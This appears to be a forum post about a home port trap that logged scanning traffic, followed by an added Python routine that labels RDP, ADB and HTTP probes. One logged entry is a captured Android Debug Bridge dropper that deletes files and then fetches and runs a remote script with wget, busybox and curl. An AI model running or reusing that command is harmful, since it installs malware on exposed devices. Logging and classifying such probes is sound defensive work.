Intensive 586 (ms-shuttle) port scan/exploit/hacking attempts
Recently I wanted to play a bit with TCP/UDP networking (and touch some custom HTTP server impl) in C# and found out that I'm getting requests from totally unknown dudes, such as this one:
FROM: [::ffff:]:52306
POST /cgi-bin/ViewLog.asp HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: B4ckdoor-owned-you
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
Then, I decided to go further and made a mass port-trap from 90 to 10000, and I found that the most intensive one is the 568 port which stands as ms-shuttle/smb port. Here are some samples:
[25.11.2020 21:53:46]
FROM: [::ffff:]:55852
| UTF8:
&� Cookie: mstshash=hello
[25.11.2020 21:53:33]
FROM: [::ffff:]:64787 // <= this dude was spamming me for like 2-4 hrs
| UTF8:
*� Cookie: mstshash=Administr
[25.11.2020 16:07:01]
FROM: [::ffff:]:48964
| UTF8:
X � � ����shell:>/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget; sh wget; busybox wget; sh bwget; busybox curl > bcurl; sh bcurl; curl > curl; sh curl
I tried to search for some info about this port + knock-knocks on it, but didn't succeed. My log file size now exceeds 2 Mb, so I wonder: why is this happening? Why is this port so actively being bombed? And, probably, what should I do to prevent receiving those requests?
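An added example, not part of the original post: `Cookie: mstshash=` is the token carried in an RDP X.224 connection request, and a `shell:` string is the service name in an Android Debug Bridge OPEN message, so a port trap can label such probes from their first bytes. The function and sample names are hypothetical and the sample bytes are constructed, not captured traffic.

```python
import struct

ADB_COMMANDS = {b"CNXN", b"OPEN", b"AUTH", b"WRTE"}
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"OPTIONS ")
MSTSHASH = b"Cookie: mstshash="

def classify_probe(data: bytes) -> dict:
    """Label the first bytes a trap listener received from an unknown peer."""
    # RDP: TPKT header (03 00 + 16-bit length), then an X.224 Connection Request
    # (0xE0) that may carry the "Cookie: mstshash=<name>" token seen in the logs.
    if len(data) >= 6 and data[:2] == b"\x03\x00" and (data[5] & 0xF0) == 0xE0:
        name = None
        at = data.find(MSTSHASH)
        if at != -1:
            name = data[at + len(MSTSHASH):].split(b"\r\n", 1)[0].decode("ascii", "replace")
        return {"kind": "rdp", "name": name}
    # ADB: 24-byte little-endian headers; the sixth field is command XOR 0xFFFFFFFF.
    offset, services = 0, []
    while len(data) - offset >= 24:
        cmd, _, _, size, _, magic = struct.unpack_from("<6I", data, offset)
        tag = data[offset:offset + 4]
        if tag not in ADB_COMMANDS or (cmd ^ 0xFFFFFFFF) != magic:
            break
        if tag == b"OPEN":  # payload names the requested service, e.g. "shell:..."
            body = data[offset + 24:offset + 24 + size]
            services.append(body.rstrip(b"\x00").decode("utf-8", "replace"))
        offset += 24 + size
    if offset:
        return {"kind": "adb", "services": services}
    # HTTP: keep the request line and User-Agent for the log entry.
    if data.startswith(HTTP_METHODS):
        lines = data.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
        agent = None
        for header in lines[1:]:
            key, _, value = header.partition(b":")
            if key.strip().lower() == b"user-agent":
                agent = value.strip().decode("ascii", "replace")
        return {"kind": "http", "request": lines[0].decode("ascii", "replace"), "user_agent": agent}
    return {"kind": "unknown"}

# Constructed sample captures (not real traffic), shaped like the log entries above.
def adb_message(tag: bytes, payload: bytes) -> bytes:
    cmd = struct.unpack("<I", tag)[0]
    return struct.pack("<6I", cmd, 0, 0, len(payload), 0, cmd ^ 0xFFFFFFFF) + payload
cookie = MSTSHASH + b"hello\r\n"
x224 = bytes([6 + len(cookie), 0xE0, 0, 0, 0, 0, 0]) + cookie
SAMPLE_RDP = b"\x03\x00" + struct.pack(">H", 4 + len(x224)) + x224
SAMPLE_ADB = adb_message(b"CNXN", b"host::\x00") + adb_message(b"OPEN", b"shell:echo constructed\x00")
SAMPLE_HTTP = b"POST /cgi-bin/ViewLog.asp HTTP/1.1\r\nUser-Agent: B4ckdoor-owned-you\r\n\r\n"
```

Logging the returned label next to the raw bytes groups the entries by protocol instead of leaving them as unreadable UTF-8.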